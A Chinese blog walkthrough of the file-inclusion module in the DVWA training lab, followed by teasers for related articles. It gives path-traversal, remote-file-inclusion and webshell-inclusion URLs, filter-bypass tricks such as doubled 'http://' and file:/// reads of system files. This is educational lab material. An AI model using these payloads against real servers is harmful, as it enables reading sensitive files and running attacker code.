【渗透测试-web安全】DVWA-文件包含

最新推荐文章于 2025-04-07 23:15:21 发布
最新推荐文章于 2025-04-07 23:15:21 发布
阅读量1.3k 收藏 8
点赞数
分类专栏: 网络安全 文章标签: 渗透测试 web安全 DVWA 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/harry_c/article/details/103007791
版权
本文详细介绍DVWA平台上的文件包含漏洞,从基本概念到实战利用,包括配置修改、漏洞测试、进阶攻击及防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

【渗透测试-web安全】DVWA-文件包含

基本概念

其实之前的文章说过,文件包含是一种代码的处理方法,比如函数include、require等,参数是文件名

但是如果对应的参数能够被用户可控的话,黑客就能够利用,构造出危害系统的缺口。

基本配置

等级选择

首选选择DVWA的等级为Low

进入界面

进入文件包含漏洞页面:
在这里插入图片描述
显示没有开启url包含,

文件配置

配置php.ini文件:
搜索allow_url_include 字段修改为on开启
在这里插入图片描述

重启服务

重启Apache服务再次进入:
在这里插入图片描述
文件包含已经允许

漏洞利用

分别访问file1.php、file2.php、file3.php
发现网站为:

http://localhost/dvwa/vulnerabilities/fi/?page=file1.php
http://localhost/dvwa/vulnerabilities/fi/?page=file2.php
http://localhost/dvwa/vulnerabilities/fi/?page=file3.php

测试其他网页是否能够访问:
在这里插入图片描述

显示文件无法找到,说明是可以进行访问的,服务端会寻找此文件,漏洞可以利用
猜测访问链接的构造为:

	http://localhost/dvwa/vulnerabilities/fi/file1.php
	http://localhost/dvwa/vulnerabilities/fi/file2.php
	http://localhost/dvwa/vulnerabilities/fi/file3.php

无法访问,那还是老老实实地在page后面注入参数吧

找到对应的文件夹:
在这里插入图片描述
我们试着看看能不能访问到上层目录下的php.ini文件信息:
在这里插入图片描述
构造访问参数 http://localhost/dvwa/vulnerabilities/fi/?page=…/…/php.ini:
在这里插入图片描述

			成功显示对应对应文件里面的内容
		那么我们能够执行一些文件吗?
			构造访问参数: http://localhost/dvwa/vulnerabilities/fi/?page=../../phpinfo.php

在这里插入图片描述
成功执行对应的php文件,说明我们的文件包含漏洞已经完全利用成功了。
高级一点,能够执行远程的php文件呢?
首先在本地构建另外一个站点,新建一个php文件进行访问:
在这里插入图片描述
在这里插入图片描述

			我们要做的是,在之前的链接里面执行我们构建好的执行文件
				构建访问参数: http://localhost/dvwa/vulnerabilities/fi/?page=http://localhost/hello.php

在这里插入图片描述

				成功执行,至此利用完毕,可以尽情的执行自己构建好的任意文件了。

进阶内容

基本的构建思路

首先在网站A中上传webshell.php文件,找到对应的链接比如: http://www.A.cn/webshell.php

找到B中的文件包含漏洞: http://www.B.cn/?page=
进行漏洞利用: http://www.B.cn/page=http://www.A.cn/webshell.php

其实这里我们利用了文件上传漏洞。

服务端会过滤掉对应的字符信息

当过滤…/时我们尝试使用…\代替访问中的…/

当过滤http://时我们尝试使用

httphttp://://代替
因为httphttp://://过滤掉中间的http://是还会生成另外的http://

本例程中当服务端只允许file*格式的文件包含名称,我们可以利用文件传输协议如访问系统的 file:///c:windows/win.ini

在这里插入图片描述
成功访问

防范

那么开发的时候我们该怎么杜绝文件包含利用呢?
我们可以设置白名单的方式,其他的文件包含全部被过滤掉

DVWA——文件包含
m0_74426634的博客
04-06 2352
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
渗透测试-靶场——dvwa && sqli-labs介绍部署
aming小老弟
07-18 27
#本文为广告系统自动投放广告 # 如有侵权 删改 请速速联系我们 #1 介绍 Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,是一个web安全学习神器。 SQLi-Labs是一个专业的SQL注入练习平台,适用于GET...
DVWA 文件包含
m0_56107268的博客
04-30 355
Low <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 没有做任何的现在,可以直接进行文件包含 本地包含: 远程服务器包含 : Medium <?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "...
dvwa篇之文件包含漏洞低、中、高三个级别的演示(小白必备!!!)
最新发布
qq_61426144的博客
04-07 762
简介:文件包含其初衷是应用于在后端脚本中把一些重复的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次进行编写,这种调用文件的过程一般被称为文件包含,其本身并没有什么危害,但是如果对包含的参数可控,那么在这一过程中就会产生文件包含漏洞,而文件包含又分为本地文件包含和远程文件包含
4、DVWA——文件包含
qq_55202378的博客
08-31 1746
DVWA 文件包含
DVWA全系列-文件包含
leriger的博客
09-24 2176
文件包含漏洞属于漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。几乎所有脚本语言都会提供文件包含的功能。文件包含的原理PHP中提供了四个文件包含的函数,分别是include()、include_once()、require()和require_once()。这四个函数都可以进行文件包含,但作用并不一样。require:找不到被包含的文件时会产生致命错误,并停止脚本。
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
网络安全 - Web 安全靶场 - DVWA-2.3.zip
10-09
DVWA包含了如Brute Force(暴力破解)、Command Injection(命令注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)等多种安全漏洞模块。这些模块不仅提供了实践的机会,还附带了详细的漏洞描述和成因分析,...
渗透测试环境部署DVWA
10-29
DVWA(Damn Vulnerable Web Application)是一款专门为渗透测试安全教育设计的开源Web应用程序。在这个环境中,我们可以模拟各种常见Web漏洞,如SQL注入、跨站脚本(XSS)、文件包含、命令注入等,以学习如何检测...
web渗透测试实战-DVWA-文件上传漏洞(High-高级),菜刀工具-蚁剑
qq_39174983的博客
12-30 7176
本文将描述小白本白在进行DVWA-文件上传漏洞(高级)实战时的完成步骤,以及所遇到的问题
DVWA文件包含
giun的博客
03-09 5324
一、前置知识 1、什么是文件包含 一种代码处理方法,函数如include,require等,参数是文件名。 2、文件包含漏洞 文件名的参数用户可控且过滤不严,被攻击者偷梁换柱 二、尝试low等级 打开文件包含题目会发现以下提示,我们找到php.ini配置文件(一般在安装目录里),把 allow_url_include的值改成on,然后重启phpstudy即可 The PHP function a...
dvwa中的文件包含攻击
无痕的博客
01-17 1959
文件包含攻击介绍与在dvwa中的演示
DVWA-文件包含
STTTM的博客
12-21 2388
  什么是文件包含?在文件包含里面,我们要想方设法把真正包含的文件掉包,换成恶意文件,服务器却不知道。 文件包含:是一种代码处理方式,当一个代码文件想要引用另外一个代码文件,就要用到包含,常见的包含函数有include、require等,参数是文件名。但是如果文件包含的参数用户可控且过滤不严,被攻击者偷梁换柱。 LOW等级: 首先进行正常的操作:点击fil1和file2时,仅仅是配...
DVWA文件包含(不同级别)
qq_43452198的博客
04-22 1529
File Inclusion lowmediumhighimpossible 简介 File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任...
DVWA-文件包含漏洞
热门推荐
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
DVWA篇_文件包含
06-01 423
这里以Apache为例,每次成功访问的记录都会记录在access.log下,访问失败的记录会记录在error.log下。使用fnmatch函数匹配以file开头的文件,我们可以使用file://伪协议绕过。对http(s)://、../、..\\进行了过滤,可以双写关键字来绕过。首先在文件上传处上传有写功能的木马,.txt或者.php都可以。将http://=>hthttp://tp://便可绕过。这时再查看日志文件,发现恶意代码成功被写入日志文件中。这时使用文件包含漏洞,目录遍历去包含日志文件。
文件包含+DVWA
weixin_44843084的博客
05-12 201
文件包含漏洞原理 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行。在通过PHP的函数引入文件时,由于传入的文件名没有经过过滤,导致执行了非预期的代码。 <?php $a = $_GET['a']; include($a); ?> 1.本地文件包含漏洞。网站服务器本身存在恶意文件,然后利用本地文件包含使用 2.远程文件包含漏洞。调用其他网站的恶意文件进行打开 需要php.ini allow_url_fopen = On(是否允许打开
文件包含漏洞攻击(DVWA)
魔仙棒棒之主的博客
05-11 3324
文件包含漏洞攻击DVWA一、文件包含漏洞二、Low难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI三、Medium难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI四、High难度1. 源码分析2. 本地文件包含五、Impossible难度1. 源码分析 一、文件包含漏洞 PHP文件包含漏洞是一种注入型漏洞 注入型漏洞还有XSS漏洞和SQL注入漏洞 PHP的文件包含可以直接执行包含文件的代码 包含的文件格式 是不受限制的,只要
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值